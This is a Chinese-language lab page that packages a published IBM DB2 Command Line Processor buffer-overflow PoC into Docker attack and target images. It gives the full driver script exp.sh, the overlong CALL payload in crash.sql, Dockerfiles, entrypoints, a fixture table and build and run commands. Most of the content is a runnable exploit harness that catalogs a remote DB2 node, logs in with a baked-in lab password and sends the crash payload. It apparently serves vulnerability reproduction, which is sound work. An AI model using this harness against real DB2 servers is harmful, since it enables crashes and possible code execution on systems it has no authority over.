参考链接
IBM DB2 9.7/10.1/10.5/11.1 - Command Line Processor Buffer Overflow - Multiple dos Exploit
漏洞说明
IBM DB2 for Linux, UNIX and Windows 9.2, 10.1, 10.5, and 11.1 (includes DB2 Connect Server) is vulnerable to a stack-based buffer overflow, caused by improper bounds checking which could allow a local attacker to execute arbitrary code.
攻击镜像构建
exp.sh
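#!/usr/bin/env bash
# exp.sh — lab driver run inside the attack container (invoked from
# entrypoint.sh as `su - db2inst1 -c "cd / && bash /exp.sh <ip> <port>"`):
# catalogs the target node/database, reads tbl4, runs crash.sql (the PoC
# from the referenced advisory), then reads tbl4 again to show the effect.
#
# Arguments: $1 - target host/IP
#            $2 - target TCP port (the test image listens on SVCENAME 60000)
# Globals:   needs the db2inst1 instance environment so the `db2` CLP and
#            its catalog are available
# Returns:   exits 1 when an argument is missing or the connect fails
#
# NOTE(review): the referenced advisory describes a stack overflow in the
# Command Line Processor itself (a local issue), so a crash, if any, is
# expected in this container's `db2` client process rather than on the
# target server; confirm on the target side before reading a failed second
# select as a remote DoS.
: "${1:?usage: exp.sh <remote-ip> <remote-port>}"
: "${2:?usage: exp.sh <remote-ip> <remote-port>}"
host=$1
port=$2

echo "[+] 正在准备连接目标db2数据库"
printf '%s\n' "$host"
printf '%s\n' "$port"
# Quoted so a value with spaces or glob characters cannot be split into
# extra CLP tokens.
db2 catalog tcpip4 node remotedb remote "$host" server "$port"
db2 catalog database testdb3 as testdb33 at node remotedb
# Throw-away lab credential baked into the test image by its Dockerfile
# (`echo 'db2inst1:123456' | chpasswd`). Stop here if the connect fails so
# the "connected" message below is never printed for a dead connection.
db2 connect to testdb33 user db2inst1 using 123456 || {
  printf '%s\n' "[-] db2 connect failed" >&2
  exit 1
}
echo "[+] 已连接成功目标数据库"
echo "[+] 正在查询目标数据库数据"
# Baseline read before the PoC.
db2 -f select.sql
echo "[+] 正在发送PoC"
# Send the PoC (crash.sql holds the overlong CALL from the advisory).
db2 -f crash.sql
echo "[+] PoC发送成功"
echo "[+] 再次尝试查询数据库"
# Re-read after the PoC; a failure here is the observable effect.
db2 -f select.sql
select.sql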
-- Read tbl4 (created by the test image's create_table.sql). exp.sh runs this
-- file before and after crash.sql to show whether the connection still works.
select * from tbl4
crash.sql
CALL AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAA;
entrypoint.sh
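#!/usr/bin/env bash
# entrypoint.sh (attack image) — installs DB2 9.7 ESE from the unpacked
# tarball, creates the DAS and the db2inst1 instance, enables TCP/IP on
# port 60000, runs /exp.sh against REMOTE_IP:REMOTE_PORT as db2inst1 and
# then idles so the container stays up.
#
# Env:  REMOTE_IP, REMOTE_PORT - target for exp.sh, supplied at run time
#       (the Dockerfile's ENV lines only declare them, with empty values).
# NOTE(review): the shebang is required for the exec-form ENTRYPOINT in the
# Dockerfile; the page listing may simply have dropped it.

# Unattended ESE install. `|| echo pass` deliberately ignores a failed
# prereq check / install so the rest of the script still runs (matches the
# original listing); a real failure surfaces at db2start instead.
cd server && ./db2prereqcheck && echo 'ESE' | ./db2_install -b /opt/ibm/db2/V9.7 || echo pass

# Exit if the install tree is missing instead of running ./db2icrt from
# whatever the current directory happens to be.
cd /opt/ibm/db2/V9.7/instance || exit 1
./dascrt -u dasusr1
./db2icrt -u db2inst1 db2inst1

# Enable TCP/IP on port 60000 and restart the instance so it takes effect.
su - db2inst1 -c "db2start"
su - db2inst1 -c "db2set DB2COMM=TCPIP"
su - db2inst1 -c "db2 update dbm cfg using SVCENAME 60000"
su - db2inst1 -c "db2stop"
su - db2inst1 -c "db2start"
echo "finish"
echo "Remote IP: $REMOTE_IP"
echo "Remote PORT: $REMOTE_PORT"
# STR=$(echo $3 | cut -d "[" -f 2 |cut -d "]" -f 1 | cut -d "'" -f 2)
# echo $STR

# REMOTE_IP / REMOTE_PORT are spliced into a command string that su hands
# to db2inst1's login shell, so restrict them to host/port characters
# first; anything else (spaces, `;`, `$(`) would be parsed as shell syntax.
if [[ ! "$REMOTE_IP" =~ ^[A-Za-z0-9._:-]+$ || ! "$REMOTE_PORT" =~ ^[0-9]+$ ]]; then
  echo "invalid REMOTE_IP or REMOTE_PORT" >&2
  exit 1
fi
su - db2inst1 -c "cd / && bash /exp.sh $REMOTE_IP $REMOTE_PORT"
# Keep PID 1 alive so the container (and the db2 instance) keeps running.
tail -f /dev/null
Dockerfile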
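# Attack image: CentOS 7 + the DB2 9.7 ESE installer + the lab scripts.
# Build: docker build .   (needs v9.7_linuxx64_server.tar.gz next to it)
# Run:   supply REMOTE_IP / REMOTE_PORT with `docker run -e`; entrypoint.sh
#        installs DB2, then runs /exp.sh against that target.
FROM centos:7.2.1511
COPY v9.7_linuxx64_server.tar.gz v9.7_linuxx64_server.tar.gz
# COPY sysctl.conf /etc/sysctl.conf
RUN tar -xzvf v9.7_linuxx64_server.tar.gz
RUN rm v9.7_linuxx64_server.tar.gz
RUN yum install -y libstdc++ libstdc++.so.6 libaio
# RUN chmod 644 /etc/sysctl.conf
# RUN sysctl -p
# Only prints the IPC limits into the build log; it changes nothing.
RUN ipcs -l
# Instance / fenced / DAS users and groups. The password is a throw-away lab
# credential that exp.sh relies on; it is baked into the image.
RUN groupadd -g 901 db2iadm1 && \
groupadd -g 902 db2fadm1 && \
groupadd -g 903 dasadm1 && \
useradd -g db2iadm1 -u 801 -d /home/db2inst1 -m db2inst1 && \
useradd -g db2fadm1 -u 802 -d /home/db2fenc1 -m db2fenc1 && \
useradd -g dasadm1 -u 803 -d /home/dasadm1 -m dasusr1 &&\
echo 'db2inst1:123456' | chpasswd
# CMD ["tail",'-f','/dev/null']
# RUN cd server && ./db2prereqcheck && echo 'ESE' | ./db2_install -b /opt/ibm/db2/V9.7 || echo pass
# RUN cd /opt/ibm/db2/V9.7/instance && ./dascrt -u dasusr1 &&\
# ./db2icrt -u db2inst1 db2inst1
# RUN db2 create database KHYX_YS using codeset GBK territory CN
# RUN db2 create database KHYX_YS
# RUN db2set –all
COPY entrypoint.sh /entrypoint.sh
COPY exp.sh /exp.sh
COPY select.sql /select.sql
COPY crash.sql /crash.sql
RUN chmod +x /entrypoint.sh
RUN chmod +x /exp.sh
# Declared as build args so the ENV expansions below are defined (empty by
# default); the real values are given at run time with `docker run -e`.
ARG REMOTE_IP
ARG REMOTE_PORT
ENV REMOTE_IP=${REMOTE_IP}
ENV REMOTE_PORT=${REMOTE_PORT}
ENTRYPOINT ["/entrypoint.sh"]
# CMD ['REMOTE_IP']
# CMD ["tail",'-f','/dev/null']
EXPOSE 60000
镜像构建(获得docker_image_id_1)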
docker build .
被测环境搭建
create_table.sql
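-- Test-image fixture, run once by entrypoint.sh as db2inst1 via
-- `db2 -f create_table.sql` (no -t, so one statement per line and no ';').
CREATE DATABASE testdb3
connect to testdb3
-- tbl4 is the table select.sql reads before and after the PoC.
CREATE TABLE tbl4 (stu_name CHAR(10) NOT NULL PRIMARY KEY)
ALTER TABLE tbl4 ADD COLUMN stu_age CHAR(10)
INSERT INTO tbl4 VALUES ('alice','20')
INSERT INTO tbl4 VALUES ('bob','16')
INSERT INTO tbl4 VALUES ('tom','19')
INSERT INTO tbl4 VALUES ('john','32')
INSERT INTO tbl4 VALUES ('amy','13')
INSERT INTO tbl4 VALUES ('france','56')
INSERT INTO tbl4 VALUES ('frank','41')
-- Sanity read; its output lands in the container log.
SELECT * FROM tbl4
entrypoint.sh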
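#!/usr/bin/env bash
# entrypoint.sh (test image) — installs DB2 9.7 ESE, creates the DAS and the
# db2inst1 instance, enables TCP/IP on port 60000 and loads the tbl4 fixture
# from /create_table.sql.
# NOTE(review): the shebang is required for the exec-form ENTRYPOINT; the
# page listing may simply have dropped it.
# NOTE(review): unlike the attack image's entrypoint, this listing ends with
# no foreground process; if the container exits as soon as the fixture is
# loaded, a trailing `tail -f /dev/null` keeps PID 1 (and the instance)
# alive — confirm against the full file.

# Unattended ESE install. `|| echo pass` deliberately ignores a failed
# prereq check / install so the rest still runs (matches the original).
cd server && ./db2prereqcheck && echo 'ESE' | ./db2_install -b /opt/ibm/db2/V9.7 || echo pass

# Exit if the install tree is missing instead of running ./db2icrt from
# whatever the current directory happens to be.
cd /opt/ibm/db2/V9.7/instance || exit 1
./dascrt -u dasusr1
./db2icrt -u db2inst1 db2inst1

# Listen on TCP 60000 (the port the Dockerfile EXPOSEs), then restart so
# the setting takes effect.
su - db2inst1 -c "db2set DB2COMM=TCPIP"
su - db2inst1 -c "db2 update dbm cfg using SVCENAME 60000"
su - db2inst1 -c "db2stop"
su - db2inst1 -c "db2start"
# Create testdb3 / tbl4 as the instance owner, from / where the file lives.
su - db2inst1 -c "cd / && db2 -f create_table.sql"
Dockerfile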
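# Test (target) image: CentOS 7 + the DB2 9.7 ESE installer + the tbl4 fixture.
# Build: docker build .   (needs v9.7_linuxx64_server.tar.gz next to it)
# NOTE(review): the page runs this image with --privileged (presumably for
# DB2's IPC/kernel settings — the sysctl lines are commented out); keep a
# container that is meant to be crashed on an isolated lab host/network.
FROM centos:7.2.1511
COPY v9.7_linuxx64_server.tar.gz v9.7_linuxx64_server.tar.gz
# COPY sysctl.conf /etc/sysctl.conf
RUN tar -xzvf v9.7_linuxx64_server.tar.gz
RUN rm v9.7_linuxx64_server.tar.gz
RUN yum install -y libstdc++ libstdc++.so.6 libaio
# Only prints the IPC limits into the build log; it changes nothing.
RUN ipcs -l
# Instance / fenced / DAS users and groups. The password is a throw-away lab
# credential that the attack image's exp.sh connects with; it is baked in.
RUN groupadd -g 901 db2iadm1 && \
groupadd -g 902 db2fadm1 && \
groupadd -g 903 dasadm1 && \
useradd -g db2iadm1 -u 801 -d /home/db2inst1 -m db2inst1 && \
useradd -g db2fadm1 -u 802 -d /home/db2fenc1 -m db2fenc1 && \
useradd -g dasadm1 -u 803 -d /home/dasadm1 -m dasusr1 &&\
echo 'db2inst1:123456' | chpasswd
COPY entrypoint.sh /entrypoint.sh
# COPY exp.sh /exp.sh
COPY create_table.sql /create_table.sql
# COPY crash.sql /crash.sql
RUN chmod +x /entrypoint.sh
# RUN chmod +x /exp.sh
# ENV REMOTE_IP=${REMOTE_IP}
ENTRYPOINT ["/entrypoint.sh"]
# DB2 listens here (SVCENAME 60000 in entrypoint.sh); publish with -p.
EXPOSE 60000
# CMD ['REMOTE_IP']
# CMD ["tail",'-f','/dev/null']
镜像构建(获得docker_image_id_2)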
docker build .
被测环境容器启动(比较慢)
docker run -it -d --privileged -p 60000:60000 docker_image_id_2
攻击脚本执行
# REMOTE_IP为被测环境的ip
攻击成功效果
……(此处省略n行)……